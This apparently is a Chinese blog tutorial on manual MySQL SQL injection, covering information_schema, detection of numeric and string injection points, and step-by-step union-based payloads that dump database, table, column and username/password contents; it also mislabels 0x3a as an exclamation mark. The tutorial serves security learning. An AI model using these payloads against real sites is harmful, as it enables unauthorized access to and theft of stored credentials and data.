SQL注入的简单认识
写在前面
MYSQL5.0之后的版本,默认在数据库中存放一个information_schema
的数据库,其中应该记住里面的三个表SCHEMATA、TABLES、COLUMNS
SCHEMATA
表:存储该用户创建的所有数据库的库名,该表中记录数据库名的字段名为:SCHEMA_NAME
TABLES
表:存储该用户创建的所有数据库的库名和表名,该表中记录数据库库名和表名的宇段名分别为:TABLE SCHEMA
和TABLE_NAME
COLUMNS
表:存储该用户创建的所有数据库的库名、表名和字段名,该表中记录数据库库名、表名和宇段名的字段名为:TABLE SCHEMA
、 TABLE NAME
和COLUMN NAME
几个函数
database():当前网站使用的数据库
version():当前MySQL的版本
user():当前MySQL的用户
concat():将多个字符串连接成一个字符串(语法:concat(str1, str2,...))
group_concat():将group by产生的同一个分组中的值连接起来,返回一个字符串结果
几种查询
操作系统信息:
select @@global.version_compile_os from mysql.user
数据库权限:
and ord(mid(user(),1,1))=114 -- 返回正常说明为root
什么是SQL注入
应用程序在向后台数据库传递SQL(结构化查询语句)查询时,如果为攻击者提供了影响该查询的功能,就会引发SQL注入。攻击者通过影响传递给数据库的内容来修改SQL自身的语法和功能,并且会影响SQL所支持数据库和操作系统的功能和灵活性。
可结合试题案例加以理解:https://ne2ha.top/passages/SQLi-Labs-Practice/
数字型注入
即输入的参数为数字型
- 测试是否存在注入点
以一条SQL查询语句为例:
select * from users where id = 1
上面是正常的一条语句,但是如果攻击者通过构造:id=1'
,执行下面的语句:
select * from users where id = 1'
这样的SQL语句是错误的,所以执行SQL查询就会报错,返回异常
接着构造:
select * from users where id = 1 and 1=1
SQL语句正常执行,返回正确
然后:
select * from users where id = 1 and 1=2
语句正常执行,但1=2
为恒假条件,无法查询出结果,返回异常
满足上面的3点,大概就可以判断存在数字型注入
- 判断字段数
select * from users where id = 1 order by <数字> -- 后面直接加数字,多个字段排序
比如URL:http://example.com/?id=1 存在数字型输入
构造一:http://example.com/?id=1 order by 9--+
返回错误
构造二:http://example.com/?id=1 order by 8--+
返回正确
所以可以得到字段数为8
- 查找可显示的字段
http://example.com/?id=1 and 1=2 union select 1,2,3,4,5,6,7,8--+
- 收集信息(假设第6个可以显示数据)
and 1=2 union select 1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8-–+
查询当前使用的用户以及数据库名字和版本
- 查询所有数据库名
and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+schema_name)),7,8 from information_schema.schemata--+
- 爆表
and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+table_name)),7,8 from information_schema.tables where table_schema=0x<数据库名的十六进制>--+
- 爆字段
and 1=2 union select 1,2,3,4,5,concat(group_concat(distinct+column_name)),7,8 from information_schema.columns where table_name=0x<字段的十六进制>--+
- 爆字段内容
and 1 =2 union select 1,2,3,4,5,concat(id,0x3a,username,0x3a,password),7,8 from <表名> limit 0,1–-+
说明:id
,username
,password
均假设是上述获取到的字段名,0x3a
表示感叹号,具体按实际情况来
字符型注入
即输入的参数为字符型,于数字型的区别在于字符型的参数需要单引号闭合
select * from users where username = 'admin'
- 测试是否存在注入点
加单引号,执行语句
select * from users where username = 'admin''
语句无法执行,返回异常
加上'and 1=1
,执行语句
select * from users where username = 'admin' and 1=1'
语句同样是错误的,注释掉后面的单引号
select * from users where username = 'admin' and 1=1-- '
返回结果正常
接着构造:
select * from users where username = 'admin' and 1=2-- '
返回异常
满足上面3点,大概可以判断存在字符型注入
参考
《SQL注入攻击防御》(第二版)
《Web安全攻防:渗透测试实战指南》
https://www.lstazl.com/mysql数字型手工注入/
https://www.cnblogs.com/aq-ry/p/9368619.html
SQL注入的简单认识的更多相关文章
- 【sql注入】简单实现二次注入
[sql注入]简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 1 ...
- 防止sql注入(简单)
(1)mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集 使用方法如下: $sql = "select count ...
- php 防止sql注入的简单方法
您可以使用PHP的功能,如函数stripslashes()和addslashes(),mysql_real_escape_string()等,使安全的SQL查询. 以下是安全的SQL语句,使用PHP ...
- SQL注入攻防入门详解
=============安全性篇目录============== 本文转载 毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机 ...
- SQL注入攻防入门详解(2)
SQL注入攻防入门详解 =============安全性篇目录============== 毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱 ...
- 转!! PreparedStatement是如何防止SQL注入的
SQL注入最简单也是最常见的例子就是用户登陆这一模块,如果用户对SQL有一定的了解,同时系统并没有做防止SQL注入处理,用户可以在输入的时候加上'两个冒号作为特殊字符,这样的话会让计算机认为他输入的是 ...
- [转]SQL注入攻防入门详解
原文地址:http://www.cnblogs.com/heyuquan/archive/2012/10/31/2748577.html =============安全性篇目录============ ...
- 仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell
最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...
- SQL注入攻击和防御
部分整理... 什么是SQL注入? 简单的例子, 对于一个购物网站,可以允许搜索,price小于某值的商品 这个值用户是可以输入的,比如,100 但是对于用户,如果输入,100' OR '1'=' ...
随机推荐
- spring4.1.8扩展实战之四:感知spring容器变化(SmartLifecycle接口)
本章是<spring4.1.8扩展实战>的第四篇,如果业务上需要在spring容器启动和关闭的时候做一些操作,可以自定义SmartLifecycle接口的实现类来扩展,本章我们通过先分析再 ...
- pandas melt 与pivot 函数
(掌握这个,基本就完美无缺的任意按照自己的想法,更改列了.) 背景: 最近有个excel 数据需要转化的过程. 数据量还挺大的,大概有30多万. 需要把某些行变成列,有些列又变成行. 这个操作本身就比 ...
- MySQL 中的 information_schema 数据库
1. 概述 information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库.其中 performance_schema 用于性能分析,而 ...
- pycharm常用快捷键 --- keymap==ecplise
F5 进入函数逐行调试 F6 执行完一行代码 F8 执行到下一个断点处 ctrl + d --删除一行代码 ALT + 上/下 箭头 代码上下移动 ALT + 左/右 箭头 左--返回 ...
- 【python】随机数相关
http://www.cnblogs.com/yd1227/archive/2011/03/18/1988015.html 该博文写的很详细,备忘. 需要注意的是,写测试脚本的时候,不要将脚本命名成跟 ...
- Visual Studio中把文件夹导入工程中
VS用到的功能还是太少,记录备忘. 有的时候需要把其他库的源码导入当前工程直接使用,而这个库是源码形式,又带很多目录的. 之前从没遇到过这种情况,自己的库目录自己新建,添加. 第三方库一般有单独的Pr ...
- PHP学习:set_time_limit,max_execution_time,sleep
set_time_limit 设置脚本最大允许执行时间,可以在php脚本中使用, 参数为秒,如果为0,表示无时间限制: set_time_limit(seconds); max_execution_t ...
- mac下使用iterm实现自动登陆
1.通过brew安装sshpass(手动安装也可以) ①brew安装sshpass brew install https://raw.githubusercontent.com/kadwanev/bi ...
- [Bzoj3224][Tyvj1728] 普通平衡树(splay/无旋Treap)
题目链接:https://www.lydsy.com/JudgeOnline/problem.php?id=3224 平衡树入门题,学习学习. splay(学习yyb巨佬) #include<b ...
- [BZOJ 3991][SDOI2015]寻宝游戏(dfs序)
题面 小B最近正在玩一个寻宝游戏,这个游戏的地图中有N个村庄和N-1条道路,并且任何两个村庄之间有且仅有一条路径可达.游戏开始时,玩家可以任意选择一个村庄,瞬间转移到这个村庄,然后可以任意在地图的道路 ...